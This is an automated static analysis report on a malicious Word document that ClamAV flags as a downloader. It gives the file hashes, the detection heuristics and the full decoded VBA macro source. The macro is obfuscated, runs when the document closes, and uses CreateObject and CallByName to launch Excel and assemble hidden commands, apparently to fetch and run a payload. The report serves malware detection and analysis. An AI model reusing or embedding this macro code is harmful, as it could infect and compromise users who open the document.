Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e7d4d46ad0ea5cec…

MALICIOUS

Office (OOXML)

82.7 KB Created: 2021-01-29 09:51:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: 92539d3043cc53ed9f14bfc5b48c537d SHA-1: 471f4c9a328d7a774ebeb7759b3b142b14098fd6 SHA-256: e7d4d46ad0ea5cec86aeac8223f3d99dac7d309e01cd9107bdba73571c136c71
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set gh = CreateObject(UserForm1.g9 & UserForm1.ruc)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set d9 = CallByName(gh.Workbooks, UserForm1.bu & UserForm1.co, 1, UserForm2.ComboBox1, , , , UserForm1.mp)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7028 bytes
SHA-256: 1ae044b4f63be6508144ebcbb4f1895e2b046cd4b203728461da37e3e5e237f6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public ou, dh, g5, lg, wm, gh, gq, i, qa, bx, f41, ex, u4o, fi, lw, bku

Sub Document_Close()

f6

End Sub

Sub f6()

On Error Resume Next

e3 = UserForm2.ComboBox6

UserForm2.ComboBox1.ListIndex = 5

Set gh = CreateObject(UserForm1.g9 & UserForm1.ruc)

gh.DisplayAlerts = False

ni = UserForm2.ComboBox17

cd = 1301

ng = 0

Err.Number = 0

While cd <> 0 And ng < 32

Set d9 = CallByName(gh.Workbooks, UserForm1.bu & UserForm1.co, 1, UserForm2.ComboBox1, , , , UserForm1.mp)

cd = Err.Number

ng = ng + 16

Wend

mv = UserForm2.ComboBox12

If cd <> 0 Then

jv = UserForm2.ComboBox6

ErrHandler:

b4 = CallByName(Application, UserForm1.ib & UserForm1.qw, 2)

If b4 <> False Then

Set l4 = CreateObject(UserForm1.ly & UserForm1.j4)

CallByName l4.Documents, UserForm1.bu & UserForm1.co, 1, ActiveDocument.FullName, , True

CallByName l4, UserForm1.gf & UserForm1.mu, 1, Now + TimeSerial(0, 0, 2), UserForm1.Z & UserForm1.pl & "f6"

Else

CallByName Application, UserForm1.gf & UserForm1.mu, 1, Now + TimeSerial(0, 0, 17), UserForm1.Z & UserForm1.pl & "f6"

End If

gh.Quit

qj = UserForm2.ComboBox26

Exit Sub

End If

Dim e0

kp = UserForm2.ComboBox15

Set e0 = gh.sheets(1)

o0 = "'"

bku = gh.sheets(5).Cells(1, 1)

If Len(bku) < 1 Then

If gh.ActiveWorkbook.Title <> "Google" Then

ek = UserForm2.ComboBox21

GoTo ErrHandler

cp = UserForm2.ComboBox7

Else

Exit Sub

End If

du = UserForm2.ComboBox16

End If

bb = UserForm2.ComboBox28

c2 = gh.sheets(1).Cells(75, 12).Value

ydb = gh.sheets(1).Cells(59, 49).Value

jg = UserForm2.ComboBox27

bx = gh.sheets(1).Cells(6, 39).Value

f41 = gh.sheets(2).Cells(142, 2).Value

o88 = UserForm2.ComboBox22

wm = gh.sheets(2).Cells(113, 7).Value

kv = UserForm2.ComboBox3

ty = gh.sheets(2).Cells(77, 30).Value

zj4 = gh.sheets(1).Cells(36, 34).Value

ym = gh.sheets(3).Cells(116, 4).Value

t = gh.sheets(2).Cells(20, 28).Value

bo = gh.sheets(1).Cells(74, 20).Value

u4o = gh.sheets(2).Cells(73, 8).Value

gq = e0.Cells(74, 42).Value

qa = gh.sheets(3).Cells(22, 50).Value

by = gh.sheets(3).Cells(4, 18).Value

qy = UserForm2.ComboBox19

hqj = gh.sheets(2).Cells(44, 36).Value

pn = UserForm2.ComboBox25

ex = gh.sheets(1).Cells(42, 24).Value

f3 = gh.sheets(1).Cells(47, 39).Value

q0 = gh.sheets(2).Cells(92, 36).Value

ou = gh.sheets(3).Cells(53, 56).Value

jk = gh.sheets(3).Cells(42, 52).Value

fb = e0.Cells(146, 55).Value

i = gh.sheets(3).Cells(89, 46).Value

vvh = UserForm2.ComboBox23

dh = gh.sheets(3).Cells(12, 42).Value

c7 = gh.sheets(3).Cells(56, 26).Value

ouc = gh.sheets(2).Cells(54, 8).Value

lw = ""

Set Sh1 = gh.sheets(4)

n9 = 1

pj = True

While pj

ln = Sh1.Cells(n9, 1).Value

If Len(ln) < 1 Then

pj = False

Else

lw = lw & ln

End If

n9 = n9 + 1

Wend

je = CallByName(gh, bo, 2)

mk = UserForm2.ComboBox14

l5 = UserForm2.ComboBox11

UserForm1.jr.Value = zj4 & je & q0

UserForm1.ml.Value = ydb

CallByName CreateObject(ouc), fb, 1, UserForm1.jr, f3, UserForm1.ml

cb = UserForm2.ComboBox5

Set vc = CreateObject(c2)

Set cj = CallByName(vc, ty, 2)

nh = UserForm2.ComboBox27

Set ii = CallByName(cj, c7, 1)

Set qa = CallByName(vc, qa, 2)

Set lg = vc

UserForm5.ComboBox1 = "rm6"

Set ou = CallByName(fi, ou, 2)

i = CallByName(ou, i, 2)

UserForm1.x0.Value = jk & ym

UserForm3.ComboBox1 = t

UserForm1.x0.Value = by

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = i

vc = m0j

d9 = r9

e0 = se

cj = fo

ii = af

qa = df

t35 = UserForm2.ComboBox21

bx = u7

f41 = a2r

fi = ds1

ou = clb

lg = tmv

DoEvents

CallByName gh, hqj, 1

gh = rj

ig = UserForm2.ComboBox8

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C7D09B0D-E644-44C9-A5A6-54E87999975E}{068A5FF2-4071-4D07-B83C-3435B9350866}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{E4618778-B0EC-4161-82D1-25AE151C492E}{EE1D96E6-2D05-41DC-9926-FDA44FDA6836}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 r7 = UserForm2.Controls.Count - 1
 
 
 
 

 p8 = ""
 For pr = 1 To r7 Step 2
 p8 = p8 & UserForm2.Controls.Item(pr)
 Next

i4 = UserForm2.ComboBox7


 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem p8
 ComboBox1.AddItem "gz"
 
 
 
 
 

be3 = UserForm2.ComboBox26

 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{F90A2AD4-541B-4F91-870F-4D87D1D6289F}{21E66F23-5F71-4B74-BB73-57314BAF6079}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.ou, ActiveDocument.gq, VbMethod, 1, ActiveDocument.i
 CallByName ActiveDocument.ou, ActiveDocument.dh, VbMethod, UserForm1.x0.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{F8B7FAA4-A043-4445-925B-EA25AE924991}{400770B6-8120-4C1D-B1F2-DDF072666B8D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.lg, ActiveDocument.wm, VbMethod, UserForm1.x0.Value, ActiveDocument.lw, ActiveDocument.bku

zx = UserForm2.ComboBox22

End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{C3687108-C902-4132-A631-AFB4942E9413}{72CABBDE-4B8F-4365-902F-A4AA6984EFAF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.bx = CallByName(ActiveDocument.qa, ActiveDocument.bx, VbGet)
 Set ActiveDocument.f41 = CallByName(ActiveDocument.bx, ActiveDocument.f41, VbGet)
 Set ActiveDocument.fi = CallByName(ActiveDocument.f41, ActiveDocument.ex, VbMethod, ActiveDocument.u4o)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 51200 bytes
SHA-256: 0926b9cea686fa523c025015fe066265c77a40ac1dc6545a9754408ddf02e126
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.